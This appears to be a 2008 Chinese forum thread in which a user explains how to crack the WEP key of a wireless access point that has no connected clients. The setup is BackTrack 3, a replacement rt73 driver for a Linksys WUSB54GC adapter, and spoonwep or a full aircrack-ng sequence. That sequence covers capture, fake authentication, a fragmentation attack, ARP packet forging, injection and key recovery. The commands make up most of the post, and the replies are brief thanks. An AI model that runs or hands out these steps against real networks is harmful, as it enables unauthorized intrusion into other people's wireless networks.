WUSB54GC成功在BT3 Final版上破解无客户端wep密码教程
新买了个Linksys WUSB54GC的usb无线网卡,在论坛里找不到破解无客户端wep密码的方法,只好去网上找。经过3天的努力,今天终于破解成功。BT3自带的驱动不支持fragmentation attack,下载WUSB54GC新驱动
http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
可以在xp下用winrar解压缩rt73-k2wrlz-2.0.1.tar.bz2文件
把压缩文件里面的整个Module目录复制到root下
新建一个shell窗口,更换BT3 Final版自带的rt73驱动(下面两个方法都需要做这一步)
**** Hidden Message *****
方法一:使用BT3 final版自带的spoonwep工具破解
在shell窗口输入 spoonwep
填好要破解AP的Mac地址,选择好使用的无线网卡、频道和破解方式,最后点击LAUNCH按键进行破解,如下图
方法二:使用“-1,-5”命令破解密码
返回root目录: cd ..
输入命令: airodump-ng --ivs -w name -c 6 rausb0
新建第二个shell窗口,
输入命令: ifconfig 查看无线网卡的mac地址
输入命令: aireplay-ng -1 0 -a AP的mac -h 无线网卡的mac rausb0
输入命令: aireplay-ng -5 -b AP的mac -h 无线网卡的mac rausb0
系统回显use this packet?时输入y回车,开始注入,一段时间后得到重要的fragment-xxxx-xxxxxx.xor文件
输入命令: packetforge-ng -0 -a AP的mac -h 无线网卡的mac -k 255.255.255.255 -l 255.255.255.255 -y fragment-xxxx-xxxxxx.xor -w myarp
输入命令: aireplay-ng -2 -r myarp rausb0
系统回显use this packet?输入y回车,第一个shell窗口里的#Data开始猛涨
新建第三个shell窗口,当#Data到3万多个后
输入命令: ls -l 找出最新的*.ivs文件,然后
输入命令: aircrack-ng name-01.ivs 破解密码(密码位数自动识别)
[ 本帖最后由 dk_wong 于 2008-9-13 14:01 编辑 ] 我的也是rt73芯片,等下去试下 强
强
强 楼主把做好的 lzm 上传 学习学习::P :P :P :P :P 等下去试下:lol :lol :lol :lol 原帖由 sony2725 于 2008-9-11 08:13 发表 http://forum.anywlan.com/images/common/back.gif
楼主把做好的 lzm 上传
BT3里自带的。现在有一个spoonwep2.
http://forum.anywlan.com/viewthread.php?tid=11576
命令行应该输入spoonwep :lol :lol :lol :lol 好好学习天天向上! 看看,总要回复才能看 原帖由 galaxyp 于 2008-9-11 16:06 发表 http://forum.anywlan.com/images/common/back.gif
看看,总要回复才能看 不好意思,这样只是为了让更多使用WUSB54GC的人能看到此贴:) 哎...
偶苯啊!看了这么多的东西还是一头雾水啊:'(